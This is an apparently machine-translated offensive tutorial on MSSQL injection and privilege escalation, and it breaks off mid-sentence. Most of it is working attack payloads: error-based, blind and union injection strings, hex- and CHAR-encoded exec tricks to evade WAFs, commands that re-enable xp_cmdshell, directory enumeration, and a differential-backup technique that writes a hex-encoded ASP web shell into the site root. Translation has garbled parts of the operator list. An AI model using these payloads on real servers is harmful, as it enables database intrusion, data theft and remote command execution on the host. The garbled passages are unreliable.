MSSQL 注入与提权方法整理

1 SQL Server 相关基础简介

1.1 默认库介绍

master - Used to record all SQL Server system-level information that controls user databases and data operations.

model - The boilerplate provided by SQL Server for user databases. The new user database is based on the model database.

msdb - Used by Enterprise Manager and Agent, it records task planning information, event processing information, data backup and recovery information, warning and exception information.

tempdb - It provides a storage area for temporary tables and other temporary jobs.

information

The library we often have to deal with here is the master, which stores all database names and stored procedures. Analogous to the information_schema metadatabase in MySQL.

Take the master library as an example to see the above categories, where the view table master.dbo.sysdatabases stores all database names, and the views of other databases store the table names and column names of the library. Each library's view chart has syscolumns that store all fields, and our functions programmably store them.

1

select name from master.dbo.sysdatabases;

Query the names of all databases.

1.2 字段介绍

1

select top 1 name,xtype from sysobjects;

xtype can be one of the following object types:

C=CHECK constraint

D=Default value or DEFAULT constraint

F=FOREIGN KEY Constraint

L=log

FN=scalar function

IF=Inline Table Function

P=Stored Procedure

PK=PRIMARY KEY constraint (type is K)

RF=Copy filtering stored procedure

S=System Table

TF=table function

TR=Trigger

U=User Table

UQ=UNIQUE constraint (type is K)

V=View

X=Extended stored procedure

2 SQL Server 信息收集

2.1 权限判断

SQL Server has three main bodies according to its scope of function :

Windows-level principal

Server-level principal

Database level subject

2.1.1 服务器级别

In Microsoft's official documentation, IS_SRVROLEMEMBER ( 'role' [ , 'login' ] ) , the valid values of the function role are user-defined server roles and the following fixed server roles:

Return type:

Return value

describe

0

login is not a member of role.

1

login is a member of role.

NULL

role or login is invalid, or there is no permission to view role membership.

Finally we can construct the statement:

1

2

3

4

5

6

and 1=(select is_srvrolemember('sysadmin'))

and 1=(select is_srvrolemember('serveradmin'))

and 1=(select is_srvrolemember('setupadmin'))

and 1=(select is_srvrolemember('securityadmin'))

and 1=(select is_srvrolemember('diskadmin'))

and 1=(select is_srvrolemember('bulkadmin'))

Use the --is-dba command in SQLMap to determine whether it is administrator privileges

1

select * from admin where id=1 AND 5560 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)))

2.1.2 数据库级别的角色

select IS_MEMBER('db_owner')

2.2 基本信息

1

2

3

4

@@version //Database version

user //Get the current database user name

db_name() //Current database name where db_name(N) can traverse other databases

;select user //Query whether multiple statements are supported

2.3 判断站库分离

1

select * from info where id='1' and host_name()=@@servername;--'

The easiest way, of course you can call xp_cmdshell and you can judge it by cmd.

By simply judging the database version and current user permissions, we can think of the next step. For example, the permissions of xp_cmdshell in 2005 are generally system, while the permissions of 2008 are generally nauthority\network service

3 SQL Server 语法

3.1 注释符号

1

2

3

/*

--

;%00

3.2 空白字符

1

2

3

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

/**/

3.3 运算符号

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

+ Addition operation

- Subtraction operation

* Multiplication operation

/division operation, if the values of both expressions are integers, then the result will only take the integer value, and the decimal value will be omitted

% Module operation, return the remainder after dividing the two numbers

Bits and logic operations take the corresponding bits from the two expressions. The bits in the result are set to 1 if and only if the values of both bits in the input expression are 1, otherwise the bits in the result are set to 0

| Bit or logical operation, take the corresponding bit from the two expressions. If one of the two bits in the input expression has a value of 1, the result bit is set to 1, and only if the values of both bits are 0, the result bit is set to 0

^ bit exclusive OR operation, taking the corresponding bit from the two expressions. If only one of the two bits in the input expression has a value of 1, the bit in the result is set to 1; only if the values of both bits are 0 or 1, the bit in the result is set to 0

=equal to

Not equal to

Greater than

!=does not equal

Less than

! Not less than

=greater than or equal to

! Not greater than

=less than or equal to

ALL If the comparisons of a group are true, the comparison result is true

AND If both Boolean expressions are true, the result is true; if one of the expressions is false, the result is false

ANY If any of the comparisons in a set is true, the result is true

BETWEEN If the operand is within a certain range, the result is true

EXISTS If some rows are included in the subquery, the result is true

IN If the operand is equal to one of the expression list, the result is true

LIKE If the operand matches a pattern, the result is true

NOT Inverse the result value of any other Boolean operator

OR If either of the two boolean expressions is true, the result is true

SOME If some comparisons are true in a set of comparisons, the result is true

3.4 语法定义符号

1

2

3

4

5

6

7

8

9

Angle brackets, used to separate strings, strings are the names of syntax elements, and non-terminal characters for SQL language.

:=Define operator. Used in generating rules, separating the elements of the rule definition and the rule definition. The defined element is located on the left of the operator and the rule definition is located on the right of the operator.

[ ] Square brackets indicate optional elements in the rule. The rule part in square brackets can be explicitly specified or omitted.

{ } Curly braces gather elements in the rule. The rules section in curly braces must be specified explicitly.

() brackets are grouping operators

4 MSSQL 注入

4.1 显错注入

4.1.1 原理

MSSQL error injection uses display or implicit conversion to report error injection, for example, the following is a typical implicit conversion

1

2

3

4

5

select * from admin where id=1 and (select user)0--

select * from admin where id=1|(select user)--

Failed to convert nvarchar value 'dbo' to data type int.

Display conversion means using functions to convert. The two functions we often use are cast and convert

1

2

3

select * from admin where id=1 (select CAST(USER as int))

select * from admin where id=1 (select convert(int,user))

判断当前数据库：id=1'and db_name()0;--

爆表名：id=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');-

爆列名：id=1' and 1=(select top 1 name from sysobjects where id=(select id from sysobjects where name='admin') and name'id');-

爆数据：id=1' and 1=(select top 1 username from admin);-

4.1.2 其它用法

Of course, you can also use INFORMATION_SCHEMA.TABLES to query all tables in the database.

1

2

3

4

5

select * from INFORMATION_SCHEMA.TABLES

select * from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin'

id=1 and 1=(select top 1 table_name from information_schema.tables);-

To determine the current table name and column name, you can also use having 1=1 and group by

id=1 having 1=1

爆出当前表和字段：id=1 group by info.id,info.name having 1=1

4.1.3 简单注入绕过

Here is a declare function, which is a function that declares local variables in mssql. We often use it to bypass the interception of waf on some keywords.

1

select * from admin where id=1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) --

declare defines variables, set sets variable values, exec executes variables

The value of variables supports hex and ascii codes. When filtering quotation marks, we can encode our statements in this way.

1

2

3

select * from admin where id=1;declare @s varchar(2000) set @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 exec(@s)--

select * from admin where id=1;declare @s varchar(2000) set @s=CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + CHAR(41) exec(@s)--

4.2 盲注

In fact, the similarity with mysql is nothing more than a comparison of segmentation strings, but mssql does not have that many blind betting routines.

4.2.1 布尔盲注

1

id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1))=109

4.2.2 时间盲注

1

2

3

id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))1 WAITFOR DELAY '0:0:5'--

4.2 联合注入

mssql joint injection We generally do not use digital placeholder, but null, because using digital placeholder may cause implicit conversion

id=1 union select null,name,pass from info

You can also use the following methods:

id=1 SELECT 1 UNION (select CAST(USER as int))

5 MSSQL 提权

5.1 备份拿 shell

Backup and getting the shell involves the issue of permissions. Needless to say, the SA permissions can basically do anything without downgrading. The database permissions are db_owner. Of course, if other users also own db_owner, they can basically get the shell through backup, but they cannot do it after setting directory permissions.

5.1.1 路径的寻找

We generally have several ideas for those who need a path:

Error search

dictionary

On-site information collection

Call the storage process to search

Read the configuration file

Here we focus on the storage process, that is, these functions are used to find our website root directory. Generally, we can use xp_cmdshell, xp_dirtree, xp_dirtree, xp_subdirs

1

2

3

execute master.xp_dirtree 'c:' //List all c:\ files and directories, subdirectories

execute master.xp_dirtree 'c:',1 //Class only c:\ folder

execute master.xp_dirtree 'c:',1,1 //Column c:\ Folder plus file

By executing xp_dirtree, we return the parameters we passed in. If there is no echo, we can create a temporary table insertion in this way.

1

2

3

id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);

id=1;insert into tmp(dir,num,num1) execute master.xp_dirtree 'c:',1,1

xp_cmdshell Find path:

This xp_cmdshell is more convenient for us to call cmd command to search. For example, my web directory has a 1.aspx

1

2

C:\Users\Geefor /r c:\ %i in (1*.aspx) do @echo %i

c:\www\1.aspx

So you only need to create a table and there is a char field.

1

2

3

id=1;CREATE TABLE cmdtmp (dir varchar(8000));

id=1;insert into cmdtmp(dir) exec master.xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i'

information

SQL Server blocks access to the process of component xp_cmdshell sys.xp_cmdshell because this component has been shut down as part of this server's security configuration. System administrators can enable it by using sp_configure.

If you encounter xp_cmdshell that cannot be called and an error is reported, you can restore it by following commands:

1

2

3

4

5

//Allows to modify advanced parameters

;EXEC sp_configure 'show advanced options',1;RECONFIGURE;

//Open the xp_cmdshell extension

;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--

5.1.2 差异备份

1

2

3

4

5

6

7

8

9

10

//Complete backup once (the saving location can be changed)

backup database library name to disk='c:\bak.bak';--

create table [dbo].[test] ([cmd] [image]);

//Create table cmd and insert a sentence Trojan

insert into test(cmd) values(0x3C256578656375746528726571756573742822612229253E)

//Make differential backups

backup database library name to disk='C:\d.asp' WITH DIFFERENTIAL,FORMAT;--

There are many differential backups that may not be successful. Generally, it is a problem with directory permissions. Whether the directory you backed up for the first time may not have permissions, and whether the directory you backed up for the second time to the website directory is authorized, so generally do not directly backup to the c disk root directory.

When filtering special characters such as single quotes or path symbols, you can use the aforementioned definition local variables to execute.

5.1.3 LOG 备份

LOG backup requires the specified database to be activated as restore mode first, so alter database XXX set RECOVERY FUL needs to be executed, while differential backup does not require, so the only one of this statement is LOG backup

The requirement for LOG backup is